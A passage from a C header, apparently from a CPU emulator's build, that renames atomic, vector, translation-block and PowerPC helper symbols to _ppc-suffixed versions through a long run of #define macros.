helper_atomic_fetch_uminw_le_mmu_ppc #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_ppc #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_ppc #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_ppc #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_ppc #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_ppc #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_ppc #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_ppc #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_ppc #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_ppc #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_ppc #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_ppc #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_ppc #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_ppc #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_ppc #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_ppc #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_ppc #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_ppc #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_ppc #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_ppc #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_ppc #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_ppc #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_ppc #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_ppc #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_ppc #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_ppc #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_ppc #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_ppc #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_ppc #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_ppc #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_ppc #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_ppc #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_ppc #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_ppc #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_ppc #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_ppc #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_ppc #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_ppc #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_ppc #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_ppc #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_ppc #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_ppc #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_ppc #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_ppc #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_ppc #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_ppc #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_ppc #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_ppc #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_ppc #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_ppc #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_ppc #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_ppc #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_ppc #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_ppc #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_ppc #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_ppc #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_ppc #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_ppc #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_ppc #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_ppc #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_ppc #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_ppc #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_ppc #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_ppc #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_ppc #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_ppc #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_ppc #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_ppc #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_ppc #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_ppc #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_ppc #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_ppc #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_ppc #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_ppc #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_ppc #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_ppc #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_ppc #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_ppc #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_ppc #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_ppc #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_ppc #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_ppc #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_ppc #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_ppc #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_ppc #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_ppc #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_ppc #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_ppc #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_ppc #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_ppc #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_ppc #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_ppc #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_ppc #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_ppc #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_ppc #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_ppc #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_ppc #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_ppc #define helper_atomic_xchgb helper_atomic_xchgb_ppc #define helper_atomic_fetch_addb helper_atomic_fetch_addb_ppc #define helper_atomic_fetch_andb helper_atomic_fetch_andb_ppc #define helper_atomic_fetch_orb helper_atomic_fetch_orb_ppc #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_ppc #define helper_atomic_add_fetchb helper_atomic_add_fetchb_ppc #define helper_atomic_and_fetchb helper_atomic_and_fetchb_ppc #define helper_atomic_or_fetchb helper_atomic_or_fetchb_ppc #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_ppc #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_ppc #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_ppc #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_ppc #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_ppc #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_ppc #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_ppc #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_ppc #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_ppc #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_ppc #define helper_atomic_xchgw_le helper_atomic_xchgw_le_ppc #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_ppc #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_ppc #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_ppc #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_ppc #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_ppc #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_ppc #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_ppc #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_ppc #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_ppc #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_ppc #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_ppc #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_ppc #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_ppc #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_ppc #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_ppc #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_ppc #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_ppc #define helper_atomic_xchgw_be helper_atomic_xchgw_be_ppc #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_ppc #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_ppc #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_ppc #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_ppc #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_ppc #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_ppc #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_ppc #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_ppc #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_ppc #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_ppc #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_ppc #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_ppc #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_ppc #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_ppc #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_ppc #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_ppc #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_ppc #define helper_atomic_xchgl_le helper_atomic_xchgl_le_ppc #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_ppc #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_ppc #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_ppc #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_ppc #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_ppc #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_ppc #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_ppc #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_ppc #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_ppc #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_ppc #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_ppc #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_ppc #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_ppc #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_ppc #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_ppc #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_ppc #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_ppc #define helper_atomic_xchgl_be helper_atomic_xchgl_be_ppc #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_ppc #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_ppc #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_ppc #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_ppc #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_ppc #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_ppc #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_ppc #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_ppc #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_ppc #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_ppc #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_ppc #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_ppc #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_ppc #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_ppc #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_ppc #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_ppc #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_ppc #define helper_atomic_xchgq_le helper_atomic_xchgq_le_ppc #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_ppc #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_ppc #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_ppc #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_ppc #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_ppc #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_ppc #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_ppc #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_ppc #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_ppc #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_ppc #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_ppc #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_ppc #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_ppc #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_ppc #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_ppc #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_ppc #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_ppc #define helper_atomic_xchgq_be helper_atomic_xchgq_be_ppc #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_ppc #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_ppc #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_ppc #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_ppc #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_ppc #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_ppc #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_ppc #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_ppc #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_ppc #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_ppc #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_ppc #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_ppc #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_ppc #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_ppc #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_ppc #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_ppc #define cpu_ldub_code cpu_ldub_code_ppc #define cpu_lduw_code cpu_lduw_code_ppc #define cpu_ldl_code cpu_ldl_code_ppc #define cpu_ldq_code cpu_ldq_code_ppc #define helper_div_i32 helper_div_i32_ppc #define helper_rem_i32 helper_rem_i32_ppc #define helper_divu_i32 helper_divu_i32_ppc #define helper_remu_i32 helper_remu_i32_ppc #define helper_shl_i64 helper_shl_i64_ppc #define helper_shr_i64 helper_shr_i64_ppc #define helper_sar_i64 helper_sar_i64_ppc #define helper_div_i64 helper_div_i64_ppc #define helper_rem_i64 helper_rem_i64_ppc #define helper_divu_i64 helper_divu_i64_ppc #define helper_remu_i64 helper_remu_i64_ppc #define helper_muluh_i64 helper_muluh_i64_ppc #define helper_mulsh_i64 helper_mulsh_i64_ppc #define helper_clz_i32 helper_clz_i32_ppc #define helper_ctz_i32 helper_ctz_i32_ppc #define helper_clz_i64 helper_clz_i64_ppc #define helper_ctz_i64 helper_ctz_i64_ppc #define helper_clrsb_i32 helper_clrsb_i32_ppc #define helper_clrsb_i64 helper_clrsb_i64_ppc #define helper_ctpop_i32 helper_ctpop_i32_ppc #define helper_ctpop_i64 helper_ctpop_i64_ppc #define helper_lookup_tb_ptr helper_lookup_tb_ptr_ppc #define helper_exit_atomic helper_exit_atomic_ppc #define helper_gvec_add8 helper_gvec_add8_ppc #define helper_gvec_add16 helper_gvec_add16_ppc #define helper_gvec_add32 helper_gvec_add32_ppc #define helper_gvec_add64 helper_gvec_add64_ppc #define helper_gvec_adds8 helper_gvec_adds8_ppc #define helper_gvec_adds16 helper_gvec_adds16_ppc #define helper_gvec_adds32 helper_gvec_adds32_ppc #define helper_gvec_adds64 helper_gvec_adds64_ppc #define helper_gvec_sub8 helper_gvec_sub8_ppc #define helper_gvec_sub16 helper_gvec_sub16_ppc #define helper_gvec_sub32 helper_gvec_sub32_ppc #define helper_gvec_sub64 helper_gvec_sub64_ppc #define helper_gvec_subs8 helper_gvec_subs8_ppc #define helper_gvec_subs16 helper_gvec_subs16_ppc #define helper_gvec_subs32 helper_gvec_subs32_ppc #define helper_gvec_subs64 helper_gvec_subs64_ppc #define helper_gvec_mul8 helper_gvec_mul8_ppc #define helper_gvec_mul16 helper_gvec_mul16_ppc #define helper_gvec_mul32 helper_gvec_mul32_ppc #define helper_gvec_mul64 helper_gvec_mul64_ppc #define helper_gvec_muls8 helper_gvec_muls8_ppc #define helper_gvec_muls16 helper_gvec_muls16_ppc #define helper_gvec_muls32 helper_gvec_muls32_ppc #define helper_gvec_muls64 helper_gvec_muls64_ppc #define helper_gvec_neg8 helper_gvec_neg8_ppc #define helper_gvec_neg16 helper_gvec_neg16_ppc #define helper_gvec_neg32 helper_gvec_neg32_ppc #define helper_gvec_neg64 helper_gvec_neg64_ppc #define helper_gvec_abs8 helper_gvec_abs8_ppc #define helper_gvec_abs16 helper_gvec_abs16_ppc #define helper_gvec_abs32 helper_gvec_abs32_ppc #define helper_gvec_abs64 helper_gvec_abs64_ppc #define helper_gvec_mov helper_gvec_mov_ppc #define helper_gvec_dup64 helper_gvec_dup64_ppc #define helper_gvec_dup32 helper_gvec_dup32_ppc #define helper_gvec_dup16 helper_gvec_dup16_ppc #define helper_gvec_dup8 helper_gvec_dup8_ppc #define helper_gvec_not helper_gvec_not_ppc #define helper_gvec_and helper_gvec_and_ppc #define helper_gvec_or helper_gvec_or_ppc #define helper_gvec_xor helper_gvec_xor_ppc #define helper_gvec_andc helper_gvec_andc_ppc #define helper_gvec_orc helper_gvec_orc_ppc #define helper_gvec_nand helper_gvec_nand_ppc #define helper_gvec_nor helper_gvec_nor_ppc #define helper_gvec_eqv helper_gvec_eqv_ppc #define helper_gvec_ands helper_gvec_ands_ppc #define helper_gvec_xors helper_gvec_xors_ppc #define helper_gvec_ors helper_gvec_ors_ppc #define helper_gvec_shl8i helper_gvec_shl8i_ppc #define helper_gvec_shl16i helper_gvec_shl16i_ppc #define helper_gvec_shl32i helper_gvec_shl32i_ppc #define helper_gvec_shl64i helper_gvec_shl64i_ppc #define helper_gvec_shr8i helper_gvec_shr8i_ppc #define helper_gvec_shr16i helper_gvec_shr16i_ppc #define helper_gvec_shr32i helper_gvec_shr32i_ppc #define helper_gvec_shr64i helper_gvec_shr64i_ppc #define helper_gvec_sar8i helper_gvec_sar8i_ppc #define helper_gvec_sar16i helper_gvec_sar16i_ppc #define helper_gvec_sar32i helper_gvec_sar32i_ppc #define helper_gvec_sar64i helper_gvec_sar64i_ppc #define helper_gvec_shl8v helper_gvec_shl8v_ppc #define helper_gvec_shl16v helper_gvec_shl16v_ppc #define helper_gvec_shl32v helper_gvec_shl32v_ppc #define helper_gvec_shl64v helper_gvec_shl64v_ppc #define helper_gvec_shr8v helper_gvec_shr8v_ppc #define helper_gvec_shr16v helper_gvec_shr16v_ppc #define helper_gvec_shr32v helper_gvec_shr32v_ppc #define helper_gvec_shr64v helper_gvec_shr64v_ppc #define helper_gvec_sar8v helper_gvec_sar8v_ppc #define helper_gvec_sar16v helper_gvec_sar16v_ppc #define helper_gvec_sar32v helper_gvec_sar32v_ppc #define helper_gvec_sar64v helper_gvec_sar64v_ppc #define helper_gvec_eq8 helper_gvec_eq8_ppc #define helper_gvec_ne8 helper_gvec_ne8_ppc #define helper_gvec_lt8 helper_gvec_lt8_ppc #define helper_gvec_le8 helper_gvec_le8_ppc #define helper_gvec_ltu8 helper_gvec_ltu8_ppc #define helper_gvec_leu8 helper_gvec_leu8_ppc #define helper_gvec_eq16 helper_gvec_eq16_ppc #define helper_gvec_ne16 helper_gvec_ne16_ppc #define helper_gvec_lt16 helper_gvec_lt16_ppc #define helper_gvec_le16 helper_gvec_le16_ppc #define helper_gvec_ltu16 helper_gvec_ltu16_ppc #define helper_gvec_leu16 helper_gvec_leu16_ppc #define helper_gvec_eq32 helper_gvec_eq32_ppc #define helper_gvec_ne32 helper_gvec_ne32_ppc #define helper_gvec_lt32 helper_gvec_lt32_ppc #define helper_gvec_le32 helper_gvec_le32_ppc #define helper_gvec_ltu32 helper_gvec_ltu32_ppc #define helper_gvec_leu32 helper_gvec_leu32_ppc #define helper_gvec_eq64 helper_gvec_eq64_ppc #define helper_gvec_ne64 helper_gvec_ne64_ppc #define helper_gvec_lt64 helper_gvec_lt64_ppc #define helper_gvec_le64 helper_gvec_le64_ppc #define helper_gvec_ltu64 helper_gvec_ltu64_ppc #define helper_gvec_leu64 helper_gvec_leu64_ppc #define helper_gvec_ssadd8 helper_gvec_ssadd8_ppc #define helper_gvec_ssadd16 helper_gvec_ssadd16_ppc #define helper_gvec_ssadd32 helper_gvec_ssadd32_ppc #define helper_gvec_ssadd64 helper_gvec_ssadd64_ppc #define helper_gvec_sssub8 helper_gvec_sssub8_ppc #define helper_gvec_sssub16 helper_gvec_sssub16_ppc #define helper_gvec_sssub32 helper_gvec_sssub32_ppc #define helper_gvec_sssub64 helper_gvec_sssub64_ppc #define helper_gvec_usadd8 helper_gvec_usadd8_ppc #define helper_gvec_usadd16 helper_gvec_usadd16_ppc #define helper_gvec_usadd32 helper_gvec_usadd32_ppc #define helper_gvec_usadd64 helper_gvec_usadd64_ppc #define helper_gvec_ussub8 helper_gvec_ussub8_ppc #define helper_gvec_ussub16 helper_gvec_ussub16_ppc #define helper_gvec_ussub32 helper_gvec_ussub32_ppc #define helper_gvec_ussub64 helper_gvec_ussub64_ppc #define helper_gvec_smin8 helper_gvec_smin8_ppc #define helper_gvec_smin16 helper_gvec_smin16_ppc #define helper_gvec_smin32 helper_gvec_smin32_ppc #define helper_gvec_smin64 helper_gvec_smin64_ppc #define helper_gvec_smax8 helper_gvec_smax8_ppc #define helper_gvec_smax16 helper_gvec_smax16_ppc #define helper_gvec_smax32 helper_gvec_smax32_ppc #define helper_gvec_smax64 helper_gvec_smax64_ppc #define helper_gvec_umin8 helper_gvec_umin8_ppc #define helper_gvec_umin16 helper_gvec_umin16_ppc #define helper_gvec_umin32 helper_gvec_umin32_ppc #define helper_gvec_umin64 helper_gvec_umin64_ppc #define helper_gvec_umax8 helper_gvec_umax8_ppc #define helper_gvec_umax16 helper_gvec_umax16_ppc #define helper_gvec_umax32 helper_gvec_umax32_ppc #define helper_gvec_umax64 helper_gvec_umax64_ppc #define helper_gvec_bitsel helper_gvec_bitsel_ppc #define cpu_restore_state cpu_restore_state_ppc #define page_collection_lock page_collection_lock_ppc #define page_collection_unlock page_collection_unlock_ppc #define free_code_gen_buffer free_code_gen_buffer_ppc #define tcg_exec_init tcg_exec_init_ppc #define tb_cleanup tb_cleanup_ppc #define tb_flush tb_flush_ppc #define tb_phys_invalidate tb_phys_invalidate_ppc #define tb_gen_code tb_gen_code_ppc #define tb_exec_lock tb_exec_lock_ppc #define tb_exec_unlock tb_exec_unlock_ppc #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_ppc #define tb_invalidate_phys_range tb_invalidate_phys_range_ppc #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_ppc #define tb_check_watchpoint tb_check_watchpoint_ppc #define cpu_io_recompile cpu_io_recompile_ppc #define tb_flush_jmp_cache tb_flush_jmp_cache_ppc #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_ppc #define translator_loop_temp_check translator_loop_temp_check_ppc #define translator_loop translator_loop_ppc #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_ppc #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_ppc #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_ppc #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_ppc #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_ppc #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_ppc #define unassigned_mem_ops unassigned_mem_ops_ppc #define floatx80_infinity floatx80_infinity_ppc #define dup_const_func dup_const_func_ppc #define gen_helper_raise_exception gen_helper_raise_exception_ppc #define gen_helper_raise_interrupt gen_helper_raise_interrupt_ppc #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_ppc #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_ppc #define gen_helper_cpsr_read gen_helper_cpsr_read_ppc #define gen_helper_cpsr_write gen_helper_cpsr_write_ppc #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_ppc #define ppc_cpu_unrealize ppc_cpu_unrealize_ppc #define ppc_cpu_instance_finalize ppc_cpu_instance_finalize_ppc #define ppc_cpu_do_interrupt ppc_cpu_do_interrupt_ppc #define ppc_cpu_do_system_reset ppc_cpu_do_system_reset_ppc #define ppc_cpu_do_fwnmi_machine_check ppc_cpu_do_fwnmi_machine_check_ppc #define ppc_cpu_exec_interrupt ppc_cpu_exec_interrupt_ppc #define raise_exception_err_ra raise_exception_err_ra_ppc #define raise_exception_err raise_exception_err_ppc #define raise_exception raise_exception_ppc #define raise_exception_ra raise_exception_ra_ppc #define helper_raise_exception_err helper_raise_exception_err_ppc #define helper_store_msr helper_store_msr_ppc #define helper_rfi helper_rfi_ppc #define helper_40x_rfci helper_40x_rfci_ppc #define helper_rfdi helper_rfdi_ppc #define helper_rfci helper_rfci_ppc #define helper_rfmci helper_rfmci_ppc #define helper_tw helper_tw_ppc #define helper_rfsvc helper_rfsvc_ppc #define helper_msgclr helper_msgclr_ppc #define helper_msgsnd helper_msgsnd_ppc #define helper_book3s_msgclr helper_book3s_msgclr_ppc #define ppc_cpu_do_unaligned_access ppc_cpu_do_unaligned_access_ppc #define helper_divweu helper_divweu_ppc #define helper_divwe helper_divwe_ppc #define helper_sraw helper_sraw_ppc #define helper_popcntb helper_popcntb_ppc #define helper_div helper_div_ppc #define helper_divo helper_divo_ppc #define helper_divs helper_divs_ppc #define helper_divso helper_divso_ppc #define helper_602_mfrom helper_602_mfrom_ppc #define helper_mtvscr helper_mtvscr_ppc #define helper_vaddcuw 